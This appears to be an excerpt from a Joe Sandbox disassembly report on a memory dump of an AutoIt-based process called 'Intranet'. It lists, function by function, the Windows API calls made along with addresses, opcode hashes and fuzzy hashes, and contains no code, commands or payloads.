                                                                            • String ID:
                                                                            • API String ID: 2875472535-0
                                                                            • Opcode ID: 60b6a34073b06b37e5240b465f2877b11e2ad1a7a3b71df52f277c05aa377652
                                                                            • Instruction ID: 30c33ec5e35ee71df55220cd7f6177fcacf589a2cc5fed8fa6d24d9b0150116a
                                                                            • Opcode Fuzzy Hash: 60b6a34073b06b37e5240b465f2877b11e2ad1a7a3b71df52f277c05aa377652
                                                                            • Instruction Fuzzy Hash: 18115EB9205324DBE7308F51ED0AF93BBBCFF01B00F108959A616D6590D7B0E508ABA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: bd9aabe8bc9eba032ba7691e9107165e3f5e2271f355f782f03580f65d8f59bc
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: AB01957204818EBBCF125E84CC65CEE3F62BB19344F048557FE1858231E33AC971AB85
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B956
                                                                            • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B96E
                                                                            • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0052B992
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0052B9AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 8c33e3d86443d3d988f25bbbf7623b5bfde41661841533e243463ffbc1749e74
                                                                            • Instruction ID: 59f459f8d8aca562c9dd13025a068f3d78d45f3a68fe16c85c0115425d6037d2
                                                                            • Opcode Fuzzy Hash: 8c33e3d86443d3d988f25bbbf7623b5bfde41661841533e243463ffbc1749e74
                                                                            • Instruction Fuzzy Hash: DA1192B9D00209EFDB01CF98C884AEEBBB8FF18310F008156E914E2250D731AA659F50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0052BCB6
                                                                            • _memset.LIBCMT ref: 0052BCC5
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00568F20,00568F64), ref: 0052BCF4
                                                                            • CloseHandle.KERNEL32 ref: 0052BD06
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: 6e02431cd50e90b67ccd34420bbcc5b3c02216c2c54b3733fc9ec4da4641c829
                                                                            • Instruction ID: 504d50b9e9d1462d2dcef6a7088e5597419b96a380ceda4be808fb3d2adbaf55
                                                                            • Opcode Fuzzy Hash: 6e02431cd50e90b67ccd34420bbcc5b3c02216c2c54b3733fc9ec4da4641c829
                                                                            • Instruction Fuzzy Hash: 4AF0E9B21003047FF3602B65AC15FB77E5DEB28715F000925FA08D7192DBB54C44A7A8
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 005071A1
                                                                              • Part of subcall function 00507C7F: _memset.LIBCMT ref: 00507CB4
                                                                            • _memmove.LIBCMT ref: 005071C4
                                                                            • _memset.LIBCMT ref: 005071D1
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 005071E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 131898ae575564804cae5a9361ccf3846867051554488a5256db2d703f42fc5f
                                                                            • Instruction ID: c25aa1a205ba67608603f619004b1b6d852b00fddeff5a07b43511822e074f13
                                                                            • Opcode Fuzzy Hash: 131898ae575564804cae5a9361ccf3846867051554488a5256db2d703f42fc5f
                                                                            • Instruction Fuzzy Hash: D6F0303A100104ABCB416F55DC89F4ABB29FF45321F04C055FE085E26AC735E915EBB4
                                                                            APIs
                                                                              • Part of subcall function 004A16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                              • Part of subcall function 004A16CF: BeginPath.GDI32(?), ref: 004A174F
                                                                              • Part of subcall function 004A16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000,00000000,00000000,000000FF,00000002,00000001,?,?,0052C4C0,00000000,?,00000008,00000000), ref: 0052C3E8
                                                                            • LineTo.GDI32(00000000,?,?,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C3F5
                                                                            • EndPath.GDI32(00000000,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C405
                                                                            • StrokePath.GDI32(00000000,?,0052C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0052C413
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 5af7c2040e028e98b80353ab8ed14d28c939e50d4e0b52e95582f17ab4a6c2c9
                                                                            • Instruction ID: 24e0eea7d3364b995b62cd07e3ca6aeeebd1be4e7421774489558b45e986586d
                                                                            • Opcode Fuzzy Hash: 5af7c2040e028e98b80353ab8ed14d28c939e50d4e0b52e95582f17ab4a6c2c9
                                                                            • Instruction Fuzzy Hash: ADF0BE31005268BBDF126F54AC0DFCE3F59AF2A315F048000FA11662E283B41969EFE9
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004FAA6F
                                                                            • GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 004FAA82
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004FAA89
                                                                            • AttachThreadInput.USER32(00000000), ref: 004FAA90
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: 5d693a6fd30d58d5dd814fcd9636b3ee2e93a7ba17abca68109ea08a5251f22c
                                                                            • Instruction ID: 676ca08cb36e828f79998316684c7f3039b2e48801ccaa337bf472a07992f0d0
                                                                            • Opcode Fuzzy Hash: 5d693a6fd30d58d5dd814fcd9636b3ee2e93a7ba17abca68109ea08a5251f22c
                                                                            • Instruction Fuzzy Hash: ADE0157194132CBADB215BA29D0DEE73E1CEF257A1F008012B60984190C7758568DBA1
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008,00000000), ref: 004A260D
                                                                            • SetTextColor.GDI32(?,000000FF,00000000), ref: 004A2617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004A262C
                                                                            • GetStockObject.GDI32(00000005), ref: 004A2634
                                                                            • GetWindowDC.USER32(?,00000000), ref: 004DC1C4
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 004DC1D1
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 004DC1EA
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 004DC203
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 004DC223
                                                                            • ReleaseDC.USER32(?,00000000), ref: 004DC22E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: 092aa0fd10298368ef320e8999225f5f778d8c5f23bd984ba7508cfb8c4203e6
                                                                            • Instruction ID: 3dab0cdca3cb1ceaf552d1b21bfb40b01913d51981dfecb0f03f5f4bdbbc933f
                                                                            • Opcode Fuzzy Hash: 092aa0fd10298368ef320e8999225f5f778d8c5f23bd984ba7508cfb8c4203e6
                                                                            • Instruction Fuzzy Hash: B7E06D31504344BBDB225FA8AC59BD93B15EB25332F0483A7FA69482E187B14A84EB15
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 004F9339
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,004F8F04), ref: 004F9340
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004F8F04), ref: 004F934D
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,004F8F04), ref: 004F9354
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 3314c181973d8cee844b2c3739d78b74aaa32b10bce948df620fe9d3f14f9d7c
                                                                            • Instruction ID: e9d87d89b193b59db1ba015519d88ca62393491d9478ff24981a939805587155
                                                                            • Opcode Fuzzy Hash: 3314c181973d8cee844b2c3739d78b74aaa32b10bce948df620fe9d3f14f9d7c
                                                                            • Instruction Fuzzy Hash: B5E086366013119FD7205FF19D0DF573B6CEF64792F104858B745C91D0E6389448DB54
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 004E0679
                                                                            • GetDC.USER32(00000000), ref: 004E0683
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E06A3
                                                                            • ReleaseDC.USER32(?,?,?,?,?), ref: 004E06C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 1478af5d50405a8d875ac72eb977afa1371f6ea9537bea1bb731165c893b341f
                                                                            • Instruction ID: 171aacff5990dafc6b481508c4dd1d752ec045fdbe6df8f46adf40cef95a6b49
                                                                            • Opcode Fuzzy Hash: 1478af5d50405a8d875ac72eb977afa1371f6ea9537bea1bb731165c893b341f
                                                                            • Instruction Fuzzy Hash: FCE09AB0800300EFCB019F70C819B5D7BF5EBAC310F10900AF81AA3390CB788152AF14
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 004E068D
                                                                            • GetDC.USER32(00000000), ref: 004E0697
                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E06A3
                                                                            • ReleaseDC.USER32(?,?,?,?,?), ref: 004E06C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 4a5e270a7d4e9f3b28428edb72c64f242bb810a21343efd694f4787dad009cad
                                                                            • Instruction ID: 6e41f7fd62076efdc2e732b94cdcf377f532f8d6bcad5b3a8a9e7885d9ed51bf
                                                                            • Opcode Fuzzy Hash: 4a5e270a7d4e9f3b28428edb72c64f242bb810a21343efd694f4787dad009cad
                                                                            • Instruction Fuzzy Hash: A5E012B5800304AFCB519FB0D819A9DBBF5ABAC314F109009F95AA7390CB789556AF50
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 004C5FCD
                                                                              • Part of subcall function 004C9BF4: GetLastError.KERNEL32(?,004C1003,004C8D5D,004C59C3,?,?,004C1003,?), ref: 004C9BF6
                                                                              • Part of subcall function 004C9BF4: __calloc_crt.LIBCMT ref: 004C9C17
                                                                              • Part of subcall function 004C9BF4: __initptd.LIBCMT ref: 004C9C39
                                                                              • Part of subcall function 004C9BF4: GetCurrentThreadId.KERNEL32 ref: 004C9C40
                                                                              • Part of subcall function 004C9BF4: SetLastError.KERNEL32(00000000,004C1003,004C8D5D,004C59C3,?,?,004C1003,?), ref: 004C9C58
                                                                            • CloseHandle.KERNEL32(?,?,004C5FAC), ref: 004C5FE1
                                                                            • __freeptd.LIBCMT ref: 004C5FE8
                                                                            • ExitThread.KERNEL32 ref: 004C5FF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                            • String ID:
                                                                            • API String ID: 4169687693-0
                                                                            • Opcode ID: 51ed754976c184079bca38ece924318bafda823f1dc345b22b0cbd1f860488d7
                                                                            • Instruction ID: c20801e6839cf2cf71b870d3e9f99a31529dc73168071d8037ca5fb195063471
                                                                            • Opcode Fuzzy Hash: 51ed754976c184079bca38ece924318bafda823f1dc345b22b0cbd1f860488d7
                                                                            • Instruction Fuzzy Hash: 45D0A735002F51A7C2B52724AC0DF6E7210AF00B25F04461EF065952F09B68EC428649
                                                                            APIs
                                                                              • Part of subcall function 004B49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004B27AF,?,00000001), ref: 004B49F4
                                                                            • _free.LIBCMT ref: 004EFB04
                                                                            • _free.LIBCMT ref: 004EFB4B
                                                                              • Part of subcall function 004B29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 004B2ADF
                                                                            Strings
                                                                            • Bad directive syntax error, xrefs: 004EFB33
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: Bad directive syntax error
                                                                            • API String ID: 2861923089-2118420937
                                                                            • Opcode ID: 6daed84963ad47ad9ad3027cea7d0993bd1d71289e221cc026fe8c41147bf42e
                                                                            • Instruction ID: 77fc04167e2ab378b1b96003ecaa0f6fdc8e736657ba9f4e9983f813b316ce64
                                                                            • Opcode Fuzzy Hash: 6daed84963ad47ad9ad3027cea7d0993bd1d71289e221cc026fe8c41147bf42e
                                                                            • Instruction Fuzzy Hash: 45919471900259AFCF04EFA6C8519EEB7B4FF05315F10446FF415AB292DB389909CB68
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001,?,?,?), ref: 004FC057
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 8c03a2d357d38d86bdef43fd167373f8a8dd5ec846e63f8c551d2bba0f0e8cfb
                                                                            • Instruction ID: b6dd893ef04d3f9e087b23d4a33d20304da4712105275c60808be65bc216475a
                                                                            • Opcode Fuzzy Hash: 8c03a2d357d38d86bdef43fd167373f8a8dd5ec846e63f8c551d2bba0f0e8cfb
                                                                            • Instruction Fuzzy Hash: 87914974200209EFDB54CF64C984A6ABBE8FF49700F10856EFA4ACB391DB75E845CB65
                                                                            APIs
                                                                              • Part of subcall function 004B436A: _wcscpy.LIBCMT ref: 004B438D
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            • __wcsnicmp.LIBCMT ref: 0050B670
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0050B739
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: e559f2f512341112f646ce6353078509cee75eef85e79ed4530f3d46c478fb05
                                                                            • Instruction ID: 0edc0eb7aded7b503df2b178781d46478c0caeab247dd97f06bc4c2cdd39a334
                                                                            • Opcode Fuzzy Hash: e559f2f512341112f646ce6353078509cee75eef85e79ed4530f3d46c478fb05
                                                                            • Instruction Fuzzy Hash: F0618F75A00219AFDB14DF94C891EAEBBB4FF89710F10805EF946AB391D774AE40CB94
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: #VK
                                                                            • API String ID: 4104443479-3366273889
